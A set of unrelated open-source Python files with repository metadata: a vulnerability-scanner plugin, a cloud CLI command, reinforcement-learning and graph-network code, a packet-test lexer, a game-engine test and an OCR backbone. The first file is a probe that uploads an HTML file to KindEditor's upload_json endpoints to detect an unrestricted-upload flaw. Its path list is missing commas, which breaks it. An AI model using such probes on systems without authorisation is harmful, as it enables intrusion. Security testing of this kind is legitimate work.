| 2023-08-22T03:37:35
| 2023-08-22T03:37:35
| 85,373,049
| 383
| 129
| null | 2023-08-21T09:26:03
| 2017-03-18T03:27:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,816
|
py
|
upload_json.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author: orleven
import json
from aiohttp import FormData
from lib.util.aiohttputil import ClientSession
from lib.core.enums import ServicePortMap
from script import BaseScript
class Script(BaseScript):
def __init__(self):
BaseScript.__init__(self)
self.service_type = ServicePortMap.WEB
self.poc_list = [
"kindeditor/php/upload_json.php?dir=file"
"kindeditor/jsp/upload_json.jsp?dir=file"
"kindeditor/asp/upload_json.asp?dir=file"
"kindeditor/jspx/upload_json.jspx?dir=file"
"kindeditor/aspx/upload_json.aspx?dir=file"
]
async def prove(self):
if self.base_url:
async with ClientSession() as session:
for path in self.get_url_normpath_list(self.url):
if path[-1] == '/':
for poc in self.poc_list:
url = path + poc
data = FormData()
data.add_field('imgFile',
"this is a test for you. ",
filename='mytestforyou.html',
content_type='text/plain')
async with session.post(url=url, data=data) as res:
if res!=None:
text = await res.text()
try:
res = json.loads(text)
if 'url'in res.keys() and 'kindeditor' in res['url']:
yield url
except:
pass
|
a49882ae0f469751c6b50f9caef43dc0c279c632
|
636849fc7edd9dcb095cf3410a121ab37de69f02
|
/SoftLayer/CLI/virt/capacity/create.py
|
76b6a1d23556339ee2b6141ff3118d6beefe2a16
|
[
"MIT"
] |
permissive
|
softlayer/softlayer-python
|
bcb09306c3367fdbd2f1407f770c4959729b074c
|
5798373055d9f34dfd531d81638a64d0a7901a13
|
refs/heads/master
| 2023-08-23T19:32:36.990701
| 2023-08-21T03:29:44
| 2023-08-21T03:29:44
| 622,291
| 126
| 182
|
MIT
| 2023-09-14T15:04:48
| 2010-04-21T20:36:31
|
Python
|
UTF-8
|
Python
| false
| false
| 2,258
|
py
|
create.py
|
"""Create a Reserved Capacity instance."""
import click
from SoftLayer.CLI.command import SLCommand as SLCommand
from SoftLayer.CLI import environment
from SoftLayer.CLI import formatting
from SoftLayer.managers.vs_capacity import CapacityManager as CapacityManager
@click.command(cls=SLCommand)
@click.option('--name', '-n', required=True, prompt=True,
help="Name for your new reserved capacity")
@click.option('--backend_router_id', '-b', required=True, prompt=True, type=int,
help="backendRouterId, create-options has a list of valid ids to use.")
@click.option('--flavor', '-f', required=True, prompt=True,
help="Capacity keyname (C1_2X2_1_YEAR_TERM for example).")
@click.option('--instances', '-i', required=True, prompt=True, type=int,
help="Number of VSI instances this capacity reservation can support.")
@click.option('--test', is_flag=True,
help="Do not actually create the virtual server")
@environment.pass_env
def cli(env, name, backend_router_id, flavor, instances, test=False):
"""Create a Reserved Capacity instance.
[red underline]*WARNING*[/]
[red]Reserved Capacity is on a yearly contract and not cancelable until the contract is expired.[/]
"""
manager = CapacityManager(env.client)
result = manager.create(
name=name,
backend_router_id=backend_router_id,
flavor=flavor,
instances=instances,
test=test)
if test:
table = formatting.Table(['Name', 'Value'], "Test Order")
container = result['orderContainers'][0]
table.add_row(['Name', container['name']])
table.add_row(['Location', container['locationObject']['longName']])
for price in container['prices']:
table.add_row(['Contract', price['item']['description']])
table.add_row(['Hourly Total', result['postTaxRecurring']])
else:
table = formatting.Table(['Name', 'Value'], "Reciept")
table.add_row(['Order Date', result['orderDate']])
table.add_row(['Order ID', result['orderId']])
table.add_row(['status', result['placedOrder']['status']])
table.add_row(['Hourly Total', result['orderDetails']['postTaxRecurring']])
env.fout(table)
|
b0453fd48629469bb1e4fed67d8ff279266ee8bf
|
9edbe7b1ec03b557aa8f5b8fc6b7623bdb9151b3
|
/sample_factory/algo/utils/action_distributions.py
|
083b8504e7d4c512707b033ed52654ccfa74e20f
|
[
"MIT"
] |
permissive
|
alex-petrenko/sample-factory
|
77c0370ef73902c5530acec7cb49cc1eff224173
|
7e1e69550f4de4cdc003d8db5bb39e186803aee9
|
refs/heads/master
| 2023-07-24T17:27:10.924055
| 2023-06-30T12:09:31
| 2023-06-30T12:09:31
| 192,824,415
| 644
| 99
|
MIT
| 2023-07-17T08:50:05
| 2019-06-20T00:59:01
|
Python
|
UTF-8
|
Python
| false
| false
| 10,777
|
py
|
action_distributions.py
|
import math
import gymnasium as gym
import numpy as np
import torch
from torch import Tensor
from torch.distributions import Independent, Normal
from torch.nn import functional
from sample_factory.utils.typing import ActionSpace
from sample_factory.utils.utils import log
def calc_num_actions(action_space):
if isinstance(action_space, gym.spaces.Discrete):
return 1
elif isinstance(action_space, gym.spaces.Tuple):
return sum([calc_num_actions(a) for a in action_space])
elif isinstance(action_space, gym.spaces.Box):
if len(action_space.shape) != 1:
raise Exception("Non-trivial shape Box action spaces not currently supported. Try to flatten the space.")
return action_space.shape[0]
else:
raise NotImplementedError(f"Action space type {type(action_space)} not supported!")
def calc_num_action_parameters(action_space: ActionSpace) -> int:
"""Returns the number of paramaters required to represent the given action space."""
if isinstance(action_space, gym.spaces.Discrete):
return action_space.n
elif isinstance(action_space, gym.spaces.Tuple):
return sum([calc_num_action_parameters(a) for a in action_space])
elif isinstance(action_space, gym.spaces.Box):
# one mean and one standard deviation for every action
return np.prod(action_space.shape) * 2
else:
raise NotImplementedError(f"Action space type {type(action_space)} not supported!")
def is_continuous_action_space(action_space: ActionSpace) -> bool:
return isinstance(action_space, gym.spaces.Box)
def get_action_distribution(action_space, raw_logits):
"""
Create the distribution object based on provided action space and unprocessed logits.
:param action_space: Gym action space object
:param raw_logits: this function expects unprocessed raw logits (not after log-softmax!)
:return: action distribution that you can sample from
"""
assert calc_num_action_parameters(action_space) == raw_logits.shape[-1]
if isinstance(action_space, gym.spaces.Discrete):
return CategoricalActionDistribution(raw_logits)
elif isinstance(action_space, gym.spaces.Tuple):
return TupleActionDistribution(action_space, logits_flat=raw_logits)
elif isinstance(action_space, gym.spaces.Box):
return ContinuousActionDistribution(params=raw_logits)
else:
raise NotImplementedError(f"Action space type {type(action_space)} not supported!")
def sample_actions_log_probs(distribution):
if isinstance(distribution, TupleActionDistribution):
return distribution.sample_actions_log_probs()
else:
actions = distribution.sample()
log_prob_actions = distribution.log_prob(actions)
return actions, log_prob_actions
def argmax_actions(distribution):
if isinstance(distribution, TupleActionDistribution):
return distribution.argmax()
elif hasattr(distribution, "probs"):
return torch.argmax(distribution.probs, dim=-1)
elif hasattr(distribution, "means"):
return distribution.means
else:
raise NotImplementedError(f"Action distribution type {type(distribution)} does not support argmax!")
# noinspection PyAbstractClass
class CategoricalActionDistribution:
def __init__(self, raw_logits):
"""
Ctor.
:param raw_logits: unprocessed logits, typically an output of a fully-connected layer
"""
self.raw_logits = raw_logits
self.log_p = self.p = None
@property
def probs(self):
if self.p is None:
self.p = functional.softmax(self.raw_logits, dim=-1)
return self.p
@property
def log_probs(self):
if self.log_p is None:
self.log_p = functional.log_softmax(self.raw_logits, dim=-1)
return self.log_p
def sample_gumbel(self):
sample = torch.argmax(self.raw_logits - torch.empty_like(self.raw_logits).exponential_().log_(), -1)
return sample
def sample(self):
samples = torch.multinomial(self.probs, 1, True)
return samples
def log_prob(self, value):
value = value.long()
log_probs = torch.gather(self.log_probs, -1, value).view(-1)
return log_probs
def entropy(self):
p_log_p = self.log_probs * self.probs
return -p_log_p.sum(-1)
def _kl(self, other_log_probs):
probs, log_probs = self.probs, self.log_probs
kl = probs * (log_probs - other_log_probs)
kl = kl.sum(dim=-1)
return kl
def _kl_inverse(self, other_log_probs):
kl = torch.exp(other_log_probs) * (other_log_probs - self.log_probs)
kl = kl.sum(dim=-1)
return kl
def _kl_symmetric(self, other_log_probs):
return 0.5 * (self._kl(other_log_probs) + self._kl_inverse(other_log_probs))
def symmetric_kl_with_uniform_prior(self):
probs, log_probs = self.probs, self.log_probs
num_categories = log_probs.shape[-1]
uniform_prob = 1 / num_categories
log_uniform_prob = math.log(uniform_prob)
return 0.5 * (
(probs * (log_probs - log_uniform_prob)).sum(dim=-1)
+ (uniform_prob * (log_uniform_prob - log_probs)).sum(dim=-1)
)
def kl_divergence(self, other):
return self._kl(other.log_probs)
def dbg_print(self):
dbg_info = dict(
entropy=self.entropy().mean(),
min_logit=self.raw_logits.min(),
max_logit=self.raw_logits.max(),
min_prob=self.probs.min(),
max_prob=self.probs.max(),
)
msg = ""
for key, value in dbg_info.items():
msg += f"{key}={value.cpu().item():.3f} "
log.debug(msg)
class TupleActionDistribution:
"""
Basically, a tuple of independent action distributions.
Useful when the environment requires multiple independent action heads, e.g.:
- moving in the environment
- selecting a weapon
- jumping
- strafing
Empirically, it seems to be better to represent such an action distribution as a tuple of independent action
distributions, rather than a one-hot over potentially big cartesian product of all action spaces, like it's
usually done in Atari.
Entropy of such a distribution is just a sum of entropies of individual distributions.
"""
def __init__(self, action_space, logits_flat):
self.logit_lengths = [calc_num_action_parameters(s) for s in action_space.spaces]
self.split_logits = torch.split(logits_flat, self.logit_lengths, dim=1)
self.action_lengths = [calc_num_actions(s) for s in action_space.spaces]
assert len(self.split_logits) == len(action_space.spaces)
self.distributions = []
for i, space in enumerate(action_space.spaces):
self.distributions.append(get_action_distribution(space, self.split_logits[i]))
@staticmethod
def _flatten_actions(list_of_action_batches):
batch_of_action_tuples = torch.cat(list_of_action_batches, 1)
return batch_of_action_tuples
def _calc_log_probs(self, list_of_action_batches):
# calculate batched log probs for every distribution
log_probs = [d.log_prob(a) for d, a in zip(self.distributions, list_of_action_batches)]
log_probs = [lp.unsqueeze(dim=1) for lp in log_probs]
# concatenate and calculate sum of individual log-probs
# this is valid under the assumption that action distributions are independent
log_probs = torch.cat(log_probs, dim=1)
log_probs = log_probs.sum(dim=1)
return log_probs
def sample_actions_log_probs(self):
list_of_action_batches = [d.sample() for d in self.distributions]
batch_of_action_tuples = self._flatten_actions(list_of_action_batches)
log_probs = self._calc_log_probs(list_of_action_batches)
return batch_of_action_tuples, log_probs
def sample(self):
list_of_action_batches = [d.sample() for d in self.distributions]
return self._flatten_actions(list_of_action_batches)
def argmax(self):
list_of_action_batches = [argmax_actions(d) for d in self.distributions]
return torch.cat(list_of_action_batches).unsqueeze(0)
def log_prob(self, actions):
# split into batches of actions from individual distributions
list_of_action_batches = torch.split(actions, self.action_lengths, dim=1)
log_probs = self._calc_log_probs(list_of_action_batches)
return log_probs
def entropy(self):
entropies = [d.entropy().unsqueeze(dim=1) for d in self.distributions]
entropies = torch.cat(entropies, dim=1)
entropy = entropies.sum(dim=1)
return entropy
def kl_divergence(self, other):
kls = [d.kl_divergence(other_d).unsqueeze(dim=1) for d, other_d in zip(self.distributions, other.distributions)]
kls = torch.cat(kls, dim=1)
kl = kls.sum(dim=1)
return kl
def symmetric_kl_with_uniform_prior(self):
sym_kls = [d.symmetric_kl_with_uniform_prior().unsqueeze(dim=1) for d in self.distributions]
sym_kls = torch.cat(sym_kls, dim=1)
sym_kl = sym_kls.sum(dim=1)
return sym_kl
def dbg_print(self):
for d in self.distributions:
d.dbg_print()
# noinspection PyAbstractClass
class ContinuousActionDistribution(Independent):
stddev_min: float = 1e-4
stddev_max: float = 1e4
def __init__(self, params):
self.means, self.log_std, self.stddevs = self._init_impl(params, self.stddev_min, self.stddev_max)
normal_dist = Normal(self.means, self.stddevs, validate_args=False)
super().__init__(normal_dist, 1, validate_args=False)
@staticmethod
@torch.jit.script
def _init_impl(params: Tensor, stddev_min: float, stddev_max: float):
# using torch.chunk here is slightly faster than plain indexing
means, log_std = torch.chunk(params, 2, dim=1)
stddevs = log_std.exp()
stddevs = torch.clamp(stddevs, stddev_min, stddev_max)
return means, log_std, stddevs
def kl_divergence(self, other):
kl = torch.distributions.kl.kl_divergence(self, other)
return kl
def summaries(self):
return dict(
action_mean=self.means.mean(),
action_mean_min=self.means.min(),
action_mean_max=self.means.max(),
action_log_std_mean=self.log_std.mean(),
action_log_std_min=self.log_std.min(),
action_log_std_max=self.log_std.max(),
action_stddev_mean=self.stddev.mean(),
action_stddev_min=self.stddev.min(),
action_stddev_max=self.stddev.max(),
)
|
1cc12d0e87500aa3f015d332ff52f94abb8c6b5e
|
2c4c3f777d94157d5a5cf8664907de1a605a1110
|
/algorithms/GraphSage/metrics.py
|
c69630695a33d269be435e654279cf4a27904f14
|
[
"Apache-2.0"
] |
permissive
|
safe-graph/DGFraud
|
a86715662d86291c22dae389aa36d72b74042ab6
|
22b72d75f81dd057762f0c7225a4558a25095b8f
|
refs/heads/master
| 2023-08-23T01:01:04.195966
| 2022-04-20T21:39:08
| 2022-04-20T21:39:08
| 223,415,751
| 632
| 162
|
Apache-2.0
| 2020-07-31T04:10:54
| 2019-11-22T14:02:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,481
|
py
|
metrics.py
|
import tensorflow as tf
# DISCLAIMER:
# Parts of this code file were originally forked from
# https://github.com/tkipf/gcn
# which itself was very inspired by the keras package
def masked_logit_cross_entropy(preds, labels, mask):
"""Logit cross-entropy loss with masking."""
loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=preds, labels=labels)
loss = tf.reduce_sum(loss, axis=1)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.maximum(tf.reduce_sum(mask), tf.constant([1.]))
loss *= mask
return tf.reduce_mean(loss)
def masked_softmax_cross_entropy(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
loss = tf.nn.softmax_cross_entropy_with_logits(logits=preds, labels=labels)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.maximum(tf.reduce_sum(mask), tf.constant([1.]))
loss *= mask
return tf.reduce_mean(loss)
def masked_l2(preds, actuals, mask):
"""L2 loss with masking."""
loss = tf.nn.l2(preds, actuals)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_accuracy(preds, labels, mask):
"""Accuracy with masking."""
correct_prediction = tf.equal(tf.argmax(preds, 1), tf.argmax(labels, 1))
accuracy_all = tf.cast(correct_prediction, tf.float32)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
accuracy_all *= mask
return tf.reduce_mean(accuracy_all)
|
5d7ca3923de496176535ed8b5da7725d36922802
|
6bf995003dfe009129f7d93b63ec2478927324e0
|
/tools/stf/stf_lexer.py
|
5019f379612454b59da22298d5578f1fd7d9effc
|
[
"Apache-2.0"
] |
permissive
|
p4lang/p4c
|
e9fd8acfa25a6e1e42adffd136cbf6cd5e94018a
|
4a393c951e1f4fdbdc3894a1f8d2929e700adeb7
|
refs/heads/main
| 2023-09-04T16:30:20.238093
| 2023-09-04T06:55:44
| 2023-09-04T06:55:44
| 55,433,859
| 621
| 555
|
Apache-2.0
| 2023-09-14T14:22:46
| 2016-04-04T18:12:32
|
C++
|
UTF-8
|
Python
| false
| false
| 7,008
|
py
|
stf_lexer.py
|
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
# stf_lexer.py
#
# Tokenize an STF file.
# -----------------------------------------------------------------------------
import ply.lex as lex
from ply.lex import TOKEN
class STFLexer:
def __init__(self):
self.filename = ""
# Keeps track of the last token returned from self.token()
self.last_token = None
self.errors_cnt = 0
self.lexer = None
self.states = (
# add a state to lex only keywords. By default, all keywords
# are IDs. Fortunately, in the current grammar all keywords
# are commands at the beginning of a line (except for packets and bytes!).
("keyword", "inclusive"),
# lex only packet data
("packetdata", "exclusive"),
)
self.keywords = [
"ADD",
"ALL",
"BYTES",
"CHECK_COUNTER",
"EXPECT",
"NO_PACKET",
"PACKET",
"PACKETS",
"REMOVE",
"SETDEFAULT",
"WAIT",
]
self.keywords_map = {}
for keyword in self.keywords:
if keyword == "P4_PARSING_DONE":
self.keywords_map[keyword] = keyword
else:
self.keywords_map[keyword.lower()] = keyword
self.tokens = [
"COLON",
"COMMA",
"DATA_DEC",
"DATA_HEX",
"DATA_TERN",
"DATA_EXACT",
"DOT",
"ID",
"INT_CONST_BIN",
"INT_CONST_DEC",
"TERN_CONST_HEX",
"INT_CONST_HEX",
"LBRACKET",
"RBRACKET",
"LPAREN",
"RPAREN",
"SLASH",
"EQUAL",
"EQEQ",
"LE",
"LEQ",
"GT",
"GEQ",
"NEQ",
] + self.keywords
def reset_lineno(self):
"""Resets the internal line number counter of the lexer."""
self.lexer.lineno = 1
self.lexer.colno = 1
def get_lineno(self):
return self.lexer.lineno
def get_colno(self):
return self.lexer.colno
# input() and token() are required when building parser from this lexer
def input(self, text):
self.lexer.input(text)
def token(self):
self.last_token = self.lexer.token()
self.lexer.colno += 1
# print self.last_token
return self.last_token
def find_tok_column(self, token):
"""Find the column of the token in its line."""
last_cr = self.lexer.lexdata.rfind("\n", 0, token.lexpos)
return token.lexpos - last_cr
# Build the lexer
def build(self, **kwargs):
self.lexer = lex.lex(module=self, **kwargs)
# start the lexer looking for keywords
self.lexer.begin("keyword")
def _error(self, s, token):
print(s, "in file", self.filename, "at line", self.get_lineno())
self.errors_cnt += 1
t_ignore_COMMENT = r"\#.*"
t_COLON = r":"
t_COMMA = r","
t_DOT = r"\."
t_LBRACKET = r"\["
t_RBRACKET = r"\]"
t_LPAREN = r"\("
t_RPAREN = r"\)"
t_EQUAL = r"="
t_EQEQ = r"=="
t_NEQ = r"!="
t_LE = r"<"
t_LEQ = r"<="
t_GT = r">"
t_GEQ = r">="
t_SLASH = r"/"
# binary constants with ternary (don't care) bits
binary_constant = r"(0[bB][*01]+)"
hex_prefix = r"0[xX]"
hex_digits = r"[0-9a-fA-F]"
hex_constant_body = r"(" + hex_digits + r"+)"
hex_constant = r"(" + hex_prefix + hex_constant_body + r")"
hex_tern = r"([0-9a-fA-F\*]+)"
hex_tern_constant = r"(" + hex_prefix + hex_tern + r")"
dec_constant = r"([0-9]+)"
identifier = r"([a-z$A-Z_][a-z$A-Z_0-9]*)"
quoted_identifier = r"\"[^\"]+\""
@TOKEN(hex_tern_constant)
def t_TERN_CONST_HEX(self, t):
return t
@TOKEN(hex_constant)
def t_INT_CONST_HEX(self, t):
return t
@TOKEN(binary_constant)
def t_INT_CONST_BIN(self, t):
return t
@TOKEN(dec_constant)
def t_INT_CONST_DEC(self, t):
return t
# Identifiers in the keyword state should be checked against keywords.
# In fact, it should be an error not to find a keyword!!
# Throwing that as an error is left as an exercise for next time
# when we read the ply manual.
@TOKEN(identifier)
def t_keyword_ID(self, t):
typ = self.keywords_map.get(t.value.lower(), "ID")
t.type = typ
if typ == "EXPECT" or typ == "PACKET":
t.lexer.begin("packetdata")
else:
t.lexer.begin("INITIAL")
# print t, "pos:", t.lexpos, "col:", self.lexer.colno
return t
# All identifiers, including keywords are returned as ID outside
# the keyword state, except for PACKETS and BYTES (counter types)
@TOKEN(identifier)
def t_ID(self, t):
typ = self.keywords_map.get(t.value.lower(), "ID")
if typ == "BYTES" or typ == "PACKETS":
t.type = typ
# print t, "pos:", t.lexpos, "col:", self.lexer.colno
return t
@TOKEN(quoted_identifier)
def t_quoted_ID(self, t):
t.type = "ID"
t.value = t.value[1:-1]
return t
# Discard comments.
def t_COMMENT(self, t):
r"\#.*$"
pass
# Track line numbers.
def t_newline(self, t):
r"\n+"
t.lexer.lineno += len(t.value)
t.lexer.colno = 0
t.lexer.begin("keyword")
# Ignore spaces and tabs.
t_ignore = " \t"
# Error handling.
def t_error(self, t):
self._error("Illegal character '%s'" % t.value[0], t)
# PACKET DATA ------------------------------------------------------------
@TOKEN(dec_constant)
def t_packetdata_DATA_DEC(self, t):
return t
@TOKEN(hex_constant_body)
def t_packetdata_DATA_HEX(self, t):
return t
def t_packetdata_DATA_TERN(self, t):
r"\*"
return t
def t_packetdata_DATA_EXACT(self, t):
r"\$"
return t
def t_packetdata_newline(self, t):
r"\n+"
t.lexer.lineno += len(t.value)
t.lexer.begin("keyword")
# Ignore spaces and tabs.
t_packetdata_ignore = " \t"
# Error handling.
def t_packetdata_error(self, t):
self._error("invalid packet data", t)
|
30770af33cdc311099a63a4c5eca5962774764c5
|
c7c73566784a7896100e993606e1bd8fdd0ea94e
|
/tests/task/test_task_arg.py
|
26b35520538b6db99ca9bf62007ca224f9d8a014
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
panda3d/panda3d
|
c3f94df2206ff7cfe4a3b370777a56fb11a07926
|
160ba090a5e80068f61f34fc3d6f49dbb6ad52c5
|
refs/heads/master
| 2023-08-21T13:23:16.904756
| 2021-04-11T22:55:33
| 2023-08-06T06:09:32
| 13,212,165
| 4,417
| 1,072
|
NOASSERTION
| 2023-09-09T19:26:14
| 2013-09-30T10:20:25
|
C++
|
UTF-8
|
Python
| false
| false
| 733
|
py
|
test_task_arg.py
|
from direct.showbase.ShowBase import ShowBase
from direct.task import Task
from panda3d.core import Vec2
def test_task_arg(base):
def test(ship, flood, task):
ship.y += flood
return task.done
ship = Vec2(2.2, 2)
flood = 1
task = base.addTask(test, 'test_task', extraArgs=[ship, flood], appendTask=True)
base.taskMgr.step()
assert ship.y == 3
base.remove_task(task)
task = base.addTask(task)
base.taskMgr.step()
assert ship.y == 4
task = base.taskMgr.add(test, 'test_task', extraArgs=[ship, flood], appendTask=True)
base.taskMgr.step()
assert ship.y == 5
base.remove_task(task)
task = base.taskMgr.add(task)
base.taskMgr.step()
assert ship.y == 6
|
da83838515607a83f5e72d06e90aa03b26f3e847
|
b08a6adc56016a706d84752bcfb6d5bdf014f9fd
|
/trainer/craft/model/vgg16_bn.py
|
fde415fc2c087d902a9a9bafc58449aadf223f45
|
[
"Apache-2.0"
] |
permissive
|
JaidedAI/EasyOCR
|
c83903d2f0ac2adfda89b35274e71a410f7d12e8
|
f947eaa36a55adb306feac58966378e01cc67f85
|
refs/heads/master
| 2023-08-08T08:34:28.434530
| 2023-07-04T12:44:09
| 2023-07-04T12:44:09
| 247,266,215
| 20,057
| 2,937
|
Apache-2.0
| 2023-09-12T22:16:00
| 2020-03-14T11:46:39
|
Python
|
UTF-8
|
Python
| false
| false
| 2,962
|
py
|
vgg16_bn.py
|
import torch
import torch.nn as nn
import torch.nn.init as init
import torchvision
from torchvision import models
from packaging import version
def init_weights(modules):
for m in modules:
if isinstance(m, nn.Conv2d):
init.xavier_uniform_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
class vgg16_bn(torch.nn.Module):
def __init__(self, pretrained=True, freeze=True):
super(vgg16_bn, self).__init__()
if version.parse(torchvision.__version__) >= version.parse('0.13'):
vgg_pretrained_features = models.vgg16_bn(
weights=models.VGG16_BN_Weights.DEFAULT if pretrained else None
).features
else: # torchvision.__version__ < 0.13
models.vgg.model_urls['vgg16_bn'] = models.vgg.model_urls['vgg16_bn'].replace('https://', 'http://')
vgg_pretrained_features = models.vgg16_bn(pretrained=pretrained).features
self.slice1 = torch.nn.Sequential()
self.slice2 = torch.nn.Sequential()
self.slice3 = torch.nn.Sequential()
self.slice4 = torch.nn.Sequential()
self.slice5 = torch.nn.Sequential()
for x in range(12): # conv2_2
self.slice1.add_module(str(x), vgg_pretrained_features[x])
for x in range(12, 19): # conv3_3
self.slice2.add_module(str(x), vgg_pretrained_features[x])
for x in range(19, 29): # conv4_3
self.slice3.add_module(str(x), vgg_pretrained_features[x])
for x in range(29, 39): # conv5_3
self.slice4.add_module(str(x), vgg_pretrained_features[x])
# fc6, fc7 without atrous conv
self.slice5 = torch.nn.Sequential(
nn.MaxPool2d(kernel_size=3, stride=1, padding=1),
nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6),
nn.Conv2d(1024, 1024, kernel_size=1)
)
if not pretrained:
init_weights(self.slice1.modules())
init_weights(self.slice2.modules())
init_weights(self.slice3.modules())
init_weights(self.slice4.modules())
init_weights(self.slice5.modules()) # no pretrained model for fc6 and fc7
if freeze:
for param in self.slice1.parameters(): # only first conv
param.requires_grad= False
def forward(self, X):
h = self.slice1(X)
h_relu2_2 = h
h = self.slice2(h)
h_relu3_2 = h
h = self.slice3(h)
h_relu4_3 = h
h = self.slice4(h)
h_relu5_3 = h
h = self.slice5(h)
h_fc7 = h
return h_fc7, h_relu5_3, h_relu4_3, h_relu3_2, h_relu2_2
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.